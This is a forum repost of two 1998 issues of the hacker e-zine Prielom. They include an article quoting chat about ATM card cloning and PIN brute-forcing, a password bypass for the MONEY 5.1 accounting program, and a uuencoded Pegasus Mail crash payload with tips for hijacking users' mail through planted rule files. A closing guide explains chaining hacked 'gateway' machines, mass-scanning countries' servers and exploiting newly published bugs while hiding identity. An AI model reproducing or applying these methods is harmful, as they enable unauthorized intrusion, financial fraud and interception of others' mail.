pro uzivatele hysterie: prava k /html/hysteria/nav/ a dalsim adresarum mate
(rwx), takze muzete efektivne pracovat s celym navigatorem. pokud nejaky
lamer tady udela paseku, opravte to prosim - z czech (cesnet) je sem _hrozne_
pomale spojeni (btw: nechcete si to nekdo vzit na starost?). nezapomente
prosim zachovat spravne vsechny permissions, viz skripty.



jake odkazy pridavat


chctel bych, aby uroven NAVu byla co nejvyssi. nepridavejte sem prosim linky
na lamerske stranky (napr. 'jak poslat email pomoci smtp', 'jak ircckovat
telnetem', atd), popripade odkazy na (free) xxx adults only sitez. warez take
neni vitan, stejne jako BFU/windoze. toto je site o H/P/A/V, ne pro SW
piraty. vitany jsou odkazy na ruzne stranky zabyvajici se bezpecnosti
systemu, phreakovani, stavba ruzneho zeleza, uzitecne stranky o unixech,
smartcards, a spousta dalsiho.



mhi, mhi(at)hysteria.sk


navrat na obsah






0000000100000102006173020061922500619227
pajkus
 pajkus      03.03.2004 - 13:24:09 , level: 2, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #8, 16.7.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

bankomaty

slovenska policia pritvrduje

jak se dostat do MONEY 5.1 kdyz neznam heslo

hysteria navigator faq







intro



prielom 8 je celkom malinkaty a vcelku narychlo pozliepany.. to viete..
obdobie dovoleniek.. ja padam prec na dlhsi cas, tak aspon toto.. dalsie
cislo hadam ku koncu augusta..


pajka




bankomaty


tento clanok vysiel v denniku Novy Cas... odstrihol som z neho taky ten
klasicky nudny uvod typu "co je to
internet" a "kdo je to hacker"..




Od sexu az ku kradeziam ?

Osobny pocitac bez krabicky zvanej modem, pripomina luxusne auto stojace
uprostred pola. Modemy umoznuju po beznej telefonnej linke vysielat signaly zrozumitelne
pocitacu a takto si vymienat programy, odkazy, udaje, apod. Nielen
medzi dvomi znamymi, vlastniacimi modemy, ale jestvuje tiez viacero celosvetovych
sieti, ktore takuto komunikaciu umoznuju. Jednou z nich je neprofesialna FIDONET,
s centrom v USA. Jej region 42 tvoria Cechy a Slovensko. Nadsenci PC tu zivo debatuju
v desiatkach konferencii, cize rozlicne zameranych tematickych okruhoch.
Od konferencie nazvanej Kamasutra, ktorej napln netreba opisovat, cez Gaming,
v ktorej hAbaju nad svojimi starostami fanatici pocitacovych hier, az po Hardware,
kde zasa mozno hladat dobru radu ak nefunguje stroj, tiez su tu napady na
rozne technicke zlepsovaky. Dvadsiateho siedmeho jula tohto roku bolo mozne prvy
raz zaregistrovat zaujimave rozhovory, nasvecujuce... Radsej odcitujme niekolko
pasazi, kvoli zrozumitelnosti mierne upravenych.



Pirati diskutuju

Evzen P. spoza Moravy, dava do eteru otazku : "Je tady nekdo, kdo vi , co a jak
se zaznamenava na bankomatovou kartu ?" Skusenejsi kamarat zo Slovenska ho cez
terminal hned poucil : "V prvom rade musis rozlisit, ci ide o off-line system
, teda samostatne, do siete neprepojene bankomaty /u nas Sporitelna, aj v Cesku/,
alebo on-line, cize ostatne, zapojene do spolocneho systemu bankomatov. U on-line
na karte osobne cislo majitela /PIN/ byt nemusi, kedze bankomat sa nanho hned
moze cez linku spytat ustredia. U off-line tam PIN je, zrejme zakodovany, ale
v principe je to jedno. Pokial by si poznal postup verifikacie v bankomate, nebol
by problem s pocitacom vyskusat vsetky moznosti a najst tu spravnu.Aktualizacia
zoznamu neplatnych karietsa deje tak, ze tie neprepojene off-line bankomaty
obehne manik s disketou." Z ceskych krajov hned reagoval dalsi : "Byl by zajem i
o kompletni konstrukcni popis. A priloz i seznam nejakych vhodnych uctu i
s heslama. Prosim vas, a nikomu to nerikejte, kdo neni ve FIDU. Ono i tak bude
dost napadny, ze vsichni kdo maji modem maji najednou nejak moc penez." Rozhovory
pokracuju i dalsie dni. Evzen pise Ladovi Z. : "Je to mozny a proveditelny. Spusob
zapisu dat je pro jeden typ bankomatovych karet konstantni. Staci sehnat popis
struktury zaznamu a zarizeni, ktery to dovede precist.Pak kdyz mas kartu,
vyskousis pomoci computeru vsechny moznosti, a NAJDES PIN. Slysel jsem, ze se to
nekolika lidem v SRN uz povedlo. Kdyz budes mit k dispozici to co jsem napsal,
tak je to otazka nekolika malo vterin !" Do reci prispieva zas dalsi ucastnik
: "Mnohem zajimavejsi je zmenit cislo karty a teprve pak vybirat penize." Vaclav
V. dodava do debaty zaujimave veci : "Nejmenovany kolega tvrdi, ze na cteni
magneticke stopy z karty staci hlava z kazetaku, pripadne hlava z disketove
jednotky." Jindra K. daval rozumy Petrovi P. : "Na karte je zapsano, kolik jsi
ten den vybral. Takze kdyz ji po vybrani uvedes do puvodniho stavu /ctecka i zapisovacka
se daji koupit/, muzes vybirat zase..." Nasledujuci kazisvet zasa spekuloval
ako vyuzit fakt, ze off-line bankomaty nevedia o penaznych operaciach
urobenych na ostatnych bankomatoch, hned. Az ked k nim pride raz za den zamestnanec
obnovit data. Spekulant objavil, a po sieti Fidonet oznamil takuto metodu
: "Zalozim si treba deset kont. Necham si na kazdy udelat kreditni kartu. Na
kazdy konto si dam par penez. Pujdu a vyberu si z kazdyho bankomatu po 2000."
Slovak Roderik P. dodava : "V kazdom bankomate je zoznam platnych kariet spolu
s ich PIN..." Tolko snad staci na ukazku toho, co vrta v hlavach niekolkych desiatok
mladikov. Do odbornych podrobnosti zabiehat nemusime, ostatne chlapci po
kratkom case presli z tzv. echomail sposobu zasielania si sprav, ktory je volne
pristupny , na netmail. Ten uz zarucuje istu dovernost a utajenie pred sirsim
publikom.



Len otazka casu

S vypismi obsahujucimi spomenute, i dalsie pasaze, sme zasli do kosickej firmy
Lynx, kde pracuje medzinarodne uznavany a znamy odbornik na pocitacovu
bezpecnost, RNDr. Michal Danilak. Pri citani desiatok metrov papierovych pasov
vazne pokyvoval hlavou : "Tak to uz mame aj u nas. Ked to na zapade prinasa tolko
starosti, preco nie i tu ? Ceski a slovenski pirati ocividne ozivaju. Hlavnym ich
problemom zatial ostava nedostatok technickych informacii. Je vsak len otazkou
casu a snahy, kedy dokazu uskutocnit svoje zamery. Nemaju zatial dostatocne napojenie
na celosvetovu hackersku siet, aby odtial cerpali. Nemaju ani v potrebnej
miere socialne spracovanych tych odbornikov, ktori bankomaty instaluju a prevadzkuju.
V zahranici mozno v tomto smere hovorit o skutocne profesionalnom socialnom
inzinierstve, ktore hackeri pouzivaju, aby zo zasvetenych ludi vytiahli
informacie. Znamena to nadviazat doverny psychologicky kontakt s kolegom od
fachu, pracujucim napriklad v banke, a pri veceri z neho pocas rozhovoru tahat
tajne informacie. Alebo hoci si najst ucelovo v penaznom ustave frajerku. Toto su
vsak iba docasne prekazky. Je velmi pravdepodobne, ze uz tie postupy, nad ktorymi
premyslaju momentalne, by nasli v praxi uplatnenie. Najvacsie nebezpecie moze
hrozit bankomatom, ktore nie su prepojene do siete, teda najma pristrojom Slovenskej
sporitelne. Nasa policia ma teraz dost inych starosti, nez skumat high
- tech kriminalitu. Vyzaduje si to totiz nielen najvyssiu odbornost a dlhodobe
studium, ale aj narocne technicke vybavenie."



Ako to robia profici

Bude uzitocne nahliadnut do metod pouzivanych v krajinach, kde kriminalita spojena
s bankomatmi nie je uz novinkou. V jednom europskom state stal na ulici
"stedry" bankomat. Nevydaval sice peniaze, ale po zasunuti kreditnej karty a zadani
jej identifikacneho PIN cisla vyplul balicek cukrikov. Deti hned zacali
tajne brat rodicom karty a podho ku plechovemu "Mikulasovi". Prefikancom, ktori
ho postavili slo o jedine : ich stroj zosnimal a ulozil si do svojej pamate
vsetky udaje z danych kariet. Potom uz nebolo najmensim problemom vyrabat ich kopie...
Podobne si pocinali darebaci pred jeden a pol rokom vo Velkej Britanii. Tam
ukradli cely bankomat a po case ho instalovali inde. Opat mal jedinu ulohu vo
vychytavani udajov z pravych kariet. Podvodnici vdaka nemu stihli vyberat z kont
majitelov az 40 tisic libier tyzdenne. Uplne jednoduchy sposob spociva v ukradnuti
karty sikovnymi prstami vreckara, potom, co cez plece nepozorneho klienta
odpozerali, ake cislo PIN zadava do bankomatu. Primitivnejsi pachatelia potom
proste vyberu sumu a kartu zahodia. Ti prefikanejsi, clenovia dobre organizovanej
bandy, kartu ihned skopiruju a vreckarskou metodou nic netusiacej obeti zasa vratia.
Ta sa potom moze len cudovat, kam miznu z jej konta peniaze. Preto je dobre,
ak ma kazdy clen rodiny vlastnu kartu. Ovela skor totiz moze zbadat nejake podozrive
javy. A este pozor na jedno vazne nebezpecenstvo. Identifikacny znak PIN
pytaju od pouzivatela karty vylucne bankomaty. Pri plateni za tovar v obchode ho
uvadzat netreba. Staci mat ozaj len tu kartu. Vlastnu alebo cudziu.



Bankari zatial pokojni

Prva dostala moznost komentovat nase zistenia manazerka kosickej pobocky
Ceskoslovenskej obchodnej banky, a.s., Ing. Zdena Gacikova : "My mame bankomatov
zatial malo, iba styri. Vsetky prepojene on-line. Funguju na medzinarodne platne
karty zdruzenia Eurocard - Mastercard. Limit vyberu moze cinit na den az 50 tisic
korun, zavisi od bonity klienta. Od buduceho roku pribudne postupne dalsi pridavny
bezpecnostny kod, ktory dalej zvysi stupen ochrany." Ake rizika su spojene
s platenim v obchodoch, vysvetlila ing. Gacikova takto : "V obchode platitel naozaj
nepotrebuje uviest svoje cislo PIN, teda iste riziko tu je. Nie vsak tak
velke, ako vy sa na prvy pohlad zdalo. Kazdy obchodnik ma totiz svoj limit, po
ktory vyda tovar bez overenia karty. Ked chce zakaznik nakupovat za viac, vola
predajca bratislavske autorizacne centrum. Vysku limitu pozna len sam obchodnik.
Takze zlodej karty, ak nechce riskovat skore chytenie, mohol by bez vacsieho rizika
kupovat len za male sumy, povedzme do 500 korun. Vela skod by teda az do
zablokovania karty ani nestihol narobit." Namestnik riaditela Vseobecnej uverovej
banky Kosice, JUDr.Mgr. Jan Rybarik, uviedol : "My obhospodarujeme na Slovensku
160 bankomatov, vsetky prepojene on-line. Od augusta funguje v Bratislave Autorizacne
centrum Slovenska. Prinos tejto centralizacie spociva v tom, ze aj klienti
inych bank budu moct pouzivat bankomaty VUB a naopak. Nevieme zatial o utoku na
nas pristroj. Su chranene jednak svojou robustnou konstrukciou,ale aj napojenim
cez linku priamo na policiu. Pri naruseni si automaticky privola pomoc. Koniec
koncov, aj keby akosi predsa ukradli cely bankomat, cisla uctov a kody v nom nenajdu.
" Na otazku, kolko korun vojde do jednej takej ocelovej skatule, J. Rybarik
prezradi len tolko : "Nepoviem, lebo by sme len lakali chmatakov. Ale v zavislosti
od typu statisice, aj cez milion."



Policia len zacina

S celou kopou zisteneho mierime na policiu. Ako bolo mozne cakat, nijakeho kompetentneho
specialistu na pocitacovu kriminalitu tu niet. Po mensej anabaze cez
uradnikov, ktori si prehadzuju problem ani horuci zemiak, koncime u riaditela
Uradu financnej policie PZ SR, JUDr. Ignaca Behula. "Je to pre nas uplna novinka",
priznava. "Cakal som, kedy zacne pocitacova kriminalita v nasich koncinach,
ale ze prave cez bankomaty...Preskumame o co ide." Konecne slovo o sucasnom
stave vysetrovania povedal I. Behul pred niekolkymi dnami : "Nadviazali sme spolupracu
s ceskou policiou, kedze tazisko hackerskych aktivit sa sustreduje u
nich. Boli uz prve spolocne konzultacie". Na otazku, ci teda zacne preventivne
sledovanie tychto diani,napriklad konspiracnym nasadenim policajnych agentov do
piratskych komunit, krci plecami : "Je to velky problem. Nie sme dostatocne vybaveni
technicky ani personalne. Hodlame spolupracovat s odbornikmi aj z civilnej
sfery. Cesi su na tom o nieco lepsie. Verim, ze vdaka podchyteniu toho celeho uz
v zarodocnom stadiu predideme premene slov a spekulacii tych vymyselnikov v ciny.
" Co ma teda robit radovy obcan, majitel kreditnej karty ? V prvom rade davat
pozor, aby nikto nemohol odpozorovat jeho cislo PIN pri zadavani do bankomatu.
Rozumne je takisto ukladat peniaze do systemov prepojenych on-line. Tie su pre
potencialnych prienikarov ovela tvrdsim orieskom, nez tie neprepojene. A tiez dufat,
ze nasa policia v historicky kratkom case zisti, ze obusky uz na modernych
zlocincov nestacia.



navrat na obsah




Slovenska policia pritvrdzuje



Vo stvrtok 4.6.1997 kriminalna policia urobila prehliadku kancelarii
firmy Eurocomp v Bratislave. Stalo sa tak
na podnet BSA. Prehliadka bola zamerana na preverenie podozrenia ze v spolocnosti
Eurocomp dochadza k neopravnenemu kopirovaniu, rozsirovaniu a pouzivaniu pocitacovych
programov, ktorych autorske prava vlastnia clenske firmy BSA. Aliancia pred
casom dostala od anonymneho informatora indicie o tom ze na pocitacoch spolocnosti
Eurocomp su nainstalovane a pouzivane aj nelegalne kopie pocitacovych programov
od firmy Microsoft a inych clenov BSA. Spolocnost sa podla informacie mala zaoberat
aj pocitacovym piratstvom.



Anynymny informator bol byvaly pracovnik, ktory dostal padaka. Do Eurocompu
nabehlo asi 15 chlapikov v civile a pri vstupe do budovy sa preukazali povolenim
z okresnej prokuratury. Potom prikazali ludom vstat od pocitacov a zacali
prehliadku a fotografovanie. Nebola ziadna sanca na schovanie pocitacov alebo
vymazanie programov. Pokial sa niekto vzpieral, napr. ze nedostal nariadenie
od sefa, tak dvaja ludia s nim zostali pri pocitaci a dialsi isiel pre sefa.
Ja len dufam ze sa tu nenajde druhy kpt. Dastych.



rain, rainman(at)rainside.sk



navrat na obsah




Jak se dostat do MONEY 5.1 kdyz neznam heslo



Program MONEY pro vedeni ucetnictvy asi vetsina zna. A tak by se nekomu
mohlo hodit vedet, jak se do neho dostat pokud nezna heslo. A presne o tom je
tenhle clanek.
Sedel jsem si takle u kamose u pocitace a on me rika, ze vyhodne koupil
hardisk a ze prej ho melo pred nim spustu lidi. A tak ze se na nej kouknem
jestli tam neni neco zajimaviho. Tak sme zacali prochazet hadr a narazili
jsme na money 5.1. Rikame si tak 'parada treba tam budou nejaky zajimavy
data'. Tak to spustime a najednou ta strasne otravna hlaska 'ZADEJTE HESLO'.
A tak si rikam to teda ne, dokud se tam nedostanu nendu dom. Nastesti to
bylo lehci nez sem cekal. Heslo je ulozeny v souboru databazepristup.dat.Na
adrese 9Ah(154d) je ulozena delka hesla(coz ma fungovat asi jako kontrolni
soucet :) a od 9Bh(155d) je zakodovane heslo. Dekodovani je naprosto
jednoduche xor 181, no a z toho vam vyjde
ASCII cislo dekodovaneho znaku. V praxi to vypada asi takto:


00009A: 06 C6 DE CC DB D0 C1 => heslo je SKYNET

BTW:nezalezi na velikosti pismen. Pokud vam ale de jen o to se tam dostat a heslo
uplne znicit staci smazat tyto 3 soubory:

pristup.dat
pristup.ix
pristup.bpf

Pokud je tam vice tuzivatelu, tak heslo u kazdeho dalsiho uzivatele je posunute
v souboru pristup.dat o +65h(101d).



t_man


navrat na obsah




hysteria navigator faq
(
http://hysteria.sk/nav )




pridavani odkazu


pridavat odkazy do tohoto seznamu neni nic sloziteho. nejprve si vyberte
spravny adresar. doclickejte se tedy ke zvolenemu adresari a vyplnte
formular na pridavani dokumentu. do URL se zadava _cele_ url (vcetne
protokolu), tedy napr. http://www.underground.org/ . kdyz zadavate cestu k
adresari, uvadejte ji vcente lomitka ('/') na konci url. pokud '/' neuvedete,
bude browser muset delat dva http requesty - jeden na cestu bez lomitka,
server mu odpovi ze to je cesta_s_lomitkem - a druhy je uz na lomitkove url,
spravne. TITLE je strucny titulek, ktery bude odkazem. A DESC
je popisek odkazu. volte prosim popisky vystizne a kratke. V title i
description muzete pouzivat html tagy, pouzivejte jen takove, ktere
nenarusuji vzhled stranky. NEPOUZIVEJTE DIAKRITIKU!



mazani odkazu


pokud prestane nejaky odkaz fungovat, vymazte jej! do URL se zadava cesta,
jak je uvedena u odkazu. nefungujici odkaz je takovy, kde delsi dobu vraci
server 404 not found, popripade je server totalne down. !pozor! nez
usoudite, ze server je down, ujistete se, zda neni chyba u isp (cesnetum
nekdo shodil raba...), ci snad nejaky router neroutuje dokolecka, popripade
nekdo neprekopl kabelaz. pokud 404, skuste zjistit nove url.



mkdir/rmdir


muzete take samozrejme zakladat a mazat adresare. jmeno adresare muze byt
jakekoliv, ale nepouzivejte prosim diakritiku. url tohoto adresare bude
odvozeno z nazvu, tzn. budou vynechany znaky jako /.[]:,|*?`x20 :-) pokud
je adresar prazdny, muzete jej smazat. kdyz do nej vlezete, bude vam jasne
jak.



for internal use only


pro uzivatele hysterie: prava k /html/hysteria/nav/ a dalsim adresarum mate
(rwx), takze muzete efektivne pracovat s celym navigatorem. pokud nejaky
lamer tady udela paseku, opravte to prosim - z czech (cesnet) je sem _hrozne_
pomale spojeni (btw: nechcete si to nekdo vzit na starost?). nezapomente
prosim zachovat spravne vsechny permissions, viz skripty.



jake odkazy pridavat


chctel bych, aby uroven NAVu byla co nejvyssi. nepridavejte sem prosim linky
na lamerske stranky (napr. 'jak poslat email pomoci smtp', 'jak ircckovat
telnetem', atd), popripade odkazy na (free) xxx adults only sitez. warez take
neni vitan, stejne jako BFU/windoze. toto je site o H/P/A/V, ne pro SW
piraty. vitany jsou odkazy na ruzne stranky zabyvajici se bezpecnosti
systemu, phreakovani, stavba ruzneho zeleza, uzitecne stranky o unixech,
smartcards, a spousta dalsiho.



mhi, mhi(at)hysteria.sk


navrat na obsah






00000001000001020061730200619215
pajkus
 pajkus      03.03.2004 - 13:18:21 , level: 1, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #7, 31.5.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

pegasus mail 4 dos

nsa ma hacknut nasa.

unix logy II

rozhovor s jd

pocitacova kriminalita

dalsia miliarda







intro



viete ako spozna hacker ze travi prilis vela casu za pocitacom ?
ked nastupi do vytahu a double-clickne na cislo poschodia. potom
zrazu zisti ze si pomylil poschodie a hlada tlacitko Escape...



tento stary ftip som pocul v novej internetovskej kaviarni v piestanoch.
rozpravali si ho dvaja okuliarnati intelektuali a tvarili sa pritom
strasne zasvetene. internet teda uz dorazil na slovensku aj do
malych miest a na vidiek.



v prvom momente ma tato kaviaren zaujala velmi cool dizajnom. namiesto strechy
je tu obrovska sklenena pyramida. vyzera to fakt ultra-moderne, po chvilke
irc-ckovania som zaklonil hlavu a cumel hore cez tu pyramidu na modru oblohu.
aj ked je to este vcelku novostavba, uz im to sklo stihli osrat holuby.



bombonik tohoto miestecka je vsak ze v kaviarni uctuju peniaze za internet
aj ked iba sedite a pozerate sa na surfujuceho priatela. v cenniku kaviarne
sa tento trapas uvadza ako "poplatok za prisediaceho". toto je
asi fakt najblbsi sposob ako zarobit na internete, a to uz dnes clovek vidi
na sieti naozaj vselico.



este ze si ku mne nikto neprisadol.



inak bol som teraz na par sessionoch a tak som nabity folklornymi informaciami,
drbmi a klepmi najroznejsieho druhu. medzi najzaujimavejsie patri
informacia o nejakej novej neznamej skupine hackerov (alebo jednotlivcovi ?),
ktora sa specializuje na linuxy. udajne minuly tyzden hackli velke mnozstvo
linuxov po celom slovensku, vcetne napriklad eurotelu. skusal som sa povrtat v
tlaci ci nahodou o tom nenajdem nejaku zmienku, ale samozrejme eurotel mlci
ako hrob. administratori a pravnici Eurotelu sa hned vrhli na otisa, hromiho
and spol. s tazkymi obvineniami, ale su zjavne mimo. na druhej strane SCU
(hromi, voodoo..) a h00l1ganz (kocman, otis, rethad..) su momentalne
asi tak jedini aktivni bezci unixovych serverov na slovensku, takze sa ani nedivim ze
admini a operatori eurotelu (bezvadne informovani vdaka tomu ze podstatnu cast
vecernych a nocnych smien travia na irc) okamzite zacali podozrievat prave ich.
meno hromi je navyse aj tak teraz krizom-krazom sklonovane koli nedavnemu
hacku pubnetu (www.pubnet.sk). zevraj pubnet sa tentokrat vazne nasral a
ohana sa nejakym pravnikom, trestnymi oznamenami a tak. je to pre mna nepochopitelne,
pretoze pubnet uz bol tolko krat hacknuty, ze by to pre nich v podstate mala byt
kazdodenna rutina, vzrusujuca asi ako salka vychladnuteho caju.


nuz nech je to ktokolvek, partia co beha v tychto dnoch po slovenskych linuxoch
je udajne velmi schopna. maju svoje vlastne poprerabane linuxovske binarky,
pravdepodobne nieco v style klasickych SERT-ackych utilitiek z arxivu.
na linuxy sa dostavaju neznamym sposobom, chyruju famy ze vlastnia nejaky
vlastny externy exploit. nuz, myslim ze o nich este budeme pocut.



pajkus, 31.5.98, piestany



Pegasus mail 4 dos



Jiste $SUBJ znate... je to program, ktery se diky tomu, ze je zadarmo, vetrel
snad na vsechny ceske skoly, kde maji nejakou sit. Dalsi jeho zajimavosti je,
ze nema osetrene urcite neocekavane stavy. Tak se ve starsich verzich stavalo, ze
pri cteni ceskeho mailu v mime skolaboval. Verze 3.4-r0 jiz tyto bugy nema, ma
ale jine (jak je zvykem). Napriklad nejde v 3.4 cist maily, ktere maji
Content-Type: v hlavicce, ale chybi jine udaje. Nektere bugy vsak stale
zustaly, takze jimi zacneme. Vzhledem k tomu, ze v netware maji useri
vetsinou do adresare sys:mail pravo create, muzou velmi jednoduse vkladat do
mail-adresaru uzivatelu soubory. Tento bug se casto vyuzival k vlozeni login
scriptu, pokud ho user nemel. To se jiz resi tak, ze kazdy nove zalozeny user
dostane prazdny login script. Tato varianta ale neresi cely problem a tak staci
najit dalsi soubor, ktery vytvorime uzivateli a my z toho budeme neco mit...
PMail ma takovych souboru hromadu. Muzete napriklad vyrobit userovi
rule-file, staci jej pouze nakopirovat do mail-diru. Potom mu muzete jeho
prichozi maily mazat, nebo si je forwardovat... Dalsim zajimavym souborem je
xxxsig.pms, v nem jsou signatury. A nyni k tem zajimavejsim vecem. Pmail nema
kontrolu buffer overflow u funkci, ktere pracuji s Content-Type:,
Mime-Version:, X-Mailer: a MHS-ID:
. Mozna ze i u dalsich, nemel jsem uz naladu
to zkouset. Bohuzel jsou tyto holes znacne nezajimave, nebot promenne jsou
dynamicky alokovane. To ma za dusledek, ze uzivatel vidi v mailu nesmysly a
pri prohlizeni to vyvolava exceptiony :-))). Mnohem hezci bug je v
identifikaci kodovani from adresy. Jiste to znate, nektere windoze-based
mailreadery to pouzivaji: From: =?windoze-1250?Q?J=EFn_Pet=ABi=DA?=. To mi
pripada jako velke plytvani mistem, takze to nejak vyuzijeme, ne? Muzeme si
takto napriklad posilat programy, nebo neco podobneho. Nasledujici nesmysl v
PMailu 4.3-r0-dos rebootuje pocitac. Jake prekvapeni, kdyz uzivatel spusti
pmail a pocitac se mu restartuje...



begin 0777 crash.cnm
M1G)O;3H@/3]T:&ES+6ES+7-M86QL+65M86EL+7=H:6-H+7)E8F]O=',M>6]U
M<BUC;VUP=71E<BUI;BUP96=A<W5S+6UA:6PM=F5R<VEO;BTS+30P+7(P+69O
M<BUD;W,M+2U334E,12U03$5!4T4M+?#P/`_43]*35`@1C!&,#I&,$8P/ST-
M"E1O.B!9;W4-"E-U8FIE8W0Z(%)E8F]O="!M>2!C;VUP=71E<B$-"@T*2&5L
M;&L#0II9B!Y;W4@<F5A9"!T:&ES+"!Y;W4@87)E(&YO="!U<VEN9R!P;2!V
-,RXT+7(P+61O<RXN+@``
end



Jak se proti temto zlomyslnostem branit? Nejlepe je asi odebrat pravo Create
k SYS:MAIL a prenos posty resit pomoci mercury (jiny adresar). Dalsi reseni je
vsem uzivatelum vyrobit prazdne potencialni "nebezpecne" soubory. Proti buffer
overflow attackum se da branit tezko, jedine snad nepouzivat pmail, ale
nejaky mene "bugoidni" mailer. Nebo si aspon patchnete pmail tak, aby neposilal
v hlavicce X-Mailer: Pegasus Mail 3.4



mhi, mhi(at)hysteria.sk


navrat na obsah




NSA ma hacknut NASA



Agenti NSA (National Security Agency) sa budu snazit prelomit ochranu
pocitacov NASA, aby urcili ci tato vesmirna agentura dokaze zastavit
hackerov, ktori by mohli ohrozovat starty rakiet a ine kriticke
operacie, pise sa v reporte tyzennika Defense Week, ktoru som si nedavno
pecital.



Tato "studia prenikania" do neklasifikovanych pocitacovych sieti NASA
(National Aeronautics and Space Administration) je usilim pochopit , ako
lahko sa nepovolane osoby (povedzme rovno, ze asi o lamerov nepojde!) mozu
dostat k citlivym datam a co preto robi NASA. Teamy specialistov
z agentury NSA budu snazit preniknut do sieti NASA az v osmych statoch
(U.S.A.).



Ak nahodou neviete, tak uz v juni minuleho roku "hackeri" z NSA ukazali,
ze su schopni paralyzovat bojovo-strategicke pocitace Tichomorskeho
Velitelstva americkej armady a elektricke siete americkych elektrarni.
Podla Johna Pikeho z Federacie Americkych vedcov, dlhorocneho pozorovatela
NASA a ostatnych vladnych agentur, agentura NSA sa ako prva z nevojenskych
agentur snazi preniknut aj do sfery sukromia obcana, aj keby to mohlo
znamenat porusenie zakona o sukromi obcanov.



Avsak Charles Redmond, manager z NASA pre informacno-technologicku
bezpecnost uviedol ze NASA radsej da prednost nevojenskej
agenture akou NSA je, lebo len ona je schopna preverit uroven ochrany
bezpecnosti a zabezpecenia dat a zaroven aj vyvarovat sa stretu zaujmov
(kdo by predsa chcel, aby si chlapici z FBI ci CIA nahodou v systemoch NASA
nechali dake "backdoors" a potom niekedy z nudy odpalili daku raketku do
vesmiru...>;->).



Vyzera to tak, ze tieto skusky a testy budu mat za ulohu zistit, do akej
miery je lahke vstupit do citlivych sajtov (citlivy rozumej nie ako dake
tamagotchi, ale asi ako dost utajovane a prisne strazene statne tajomstva)
a do akej miery su tieto systemy ohrozovane z Internetu.



iindy - rezylana, iindy(at)iindy.sk

navrat na obsah


unix logy II.



v minulom cisle sa pisalo o tom ako mazat unix logy a teda ako utajit svoj
utok, po pripade ako naraficit falosne stopy. na to vsak treba rootovske
prava. dnesna nedelna chvilka poezie je o tom ako utajit svoju identitu pri hackerskych
utokoch pri ktorych sa nepodari ziskat na cielovej masine uid(0).



gateway



nuz, teoria je jednoducha. na cielovu masinu treba utocit cez 1 az 2 hacknute
masiny, ktore ma clovek kompletne pod kontrolou. v kruhoch byvaleho SERT-u a
CzERT-u sa taketo masinky nazyvaju folklornymi pomenovaniami "gateway",
"stargate", alebo "hniezdo". idealnym kandidatom na gateway je nejaky malo
vyuzivany linux server, napriklad nejake starsie pentium sluziace ako router
niekde v zapadnutom pocitacovom labaku na katedre sociologie. idealne geograficke
umiestnenie takejto masiny je skandinavia (vyborne linky), zapadna europa a
okolite krajiny ako madarsko, rakusko, polsko...
optimalne je mat aspon 3-4 dobre gatewaye, idealne tak okolo 10. pri niektorych typoch utokov je
nevyhnutne mat pod kontrolou gateway, ktory je DNS server danej domeny.
podla kvality gatewaya treba urcit ake typy aktivit sa na nom budu robit.
najkvalitnejsi gateway sluzi vacsinou pre interne ucely, trebars ako
file server, chat server, irc server a pod. najhorsie gatewaye sluzia
na masove scanny, floody, spam maily a podobne aktivitky. masiny na bezne
utoky su niekde uprostred.



ako ziskavat gateway stroje ? taketo masiny treba hladat masovymi scanmi.
v prvom rade je treba mat informacie o serveroch v danej domene. treba si
stiahnut vsetky DNS zaznamy danej krajiny a vybrat z nich vsetky servery.
ako sa to presne robi nebudem popisovat, nexcem aby to tu vyzeralo ako
nejaka HOW-TO kucharska kniha :) len tolko ze z DNS zaznamov treba povyhadzovat
vsetky adresy ktore obsahuju dial-upy a aliasy (hint: dial-upy maju v nazve
vacsinou cislo.. ppp-124-5.provider.cz a pod... aliasy zase maju adresy typu
www.domena.cz alebo mail.domena.sk..) idealne je samozrejme napisat si vlastny script (trebars awk/sed) ktory
to vsetko zautomatizuje. potom nie je problem takyto script spustit trebars
raz do mesiaca a vsimnut si nove masiny, ktore su cerstvo pripojene na internet.
prave tieto nove masiny su castokrat vybornym tercom na utok, lebo trebars su
nainstalovane zo stareho Linuxovskeho CDecka a este su nepatchnute.


ked ma clovek v ruke zoznam serverov v danej krajine, je dobre spravit si
o nich databazu s udajmi. velmi jednoduchy scriptik dokaze vsetky masiny
ping-nut ci vobec existuju a ziju, a potom pozriet port-scanerom niektore
zakladne porty, napriklad 21,23,25,79,80,110 - aby si clovek spravil predstavu
o tom co je to za masinu. ked sa taketo udaje ulozia do databazy, mate v ruke
uzasny a pohotovy zdroj informacii o serveroch v okolitych krajinach. este k
tym geografickym umiestneniam.. spominal som ze je dobra zapadna europa, atd..
to je koli dobrym serverom a dobrym linkam. lahsie sa vsak hackuje v rozvojovych
a chudobnych krajinach, tam su totiz pozadu a maju stare bugove servery,
avsak vacsinou maju slaby hardware a pomale linky.



ok, tak dajme tomu ze mate spravenu databazu o serveroch. teraz staci vegetit,
subscribnut si bugtraq a pockat si az nejaky genius vo finsku najde bug trebars
na nejaky cgi script a zverejni ho v bugtraqu. potom staci mrknut sa do svojej
databazy www serverov (t.j. adries s otvorenym portom 80) a okamzite mate k
dizpozicii zoznam potencialnych exploitnutelnych masiniek. staci pouzit jeden
gateway a spustit z neho scan...


redirektorove siete



ok, tak podme naspat k redirektorom. predpokladajme teda ze je k dispozicii
zo 10 masin na ktorych su umiestnene redirektory. pri opakovanych utokoch
na jeden cielovy stroj je dobre napevno si spravit 2-3 na seba napojene redirektory.
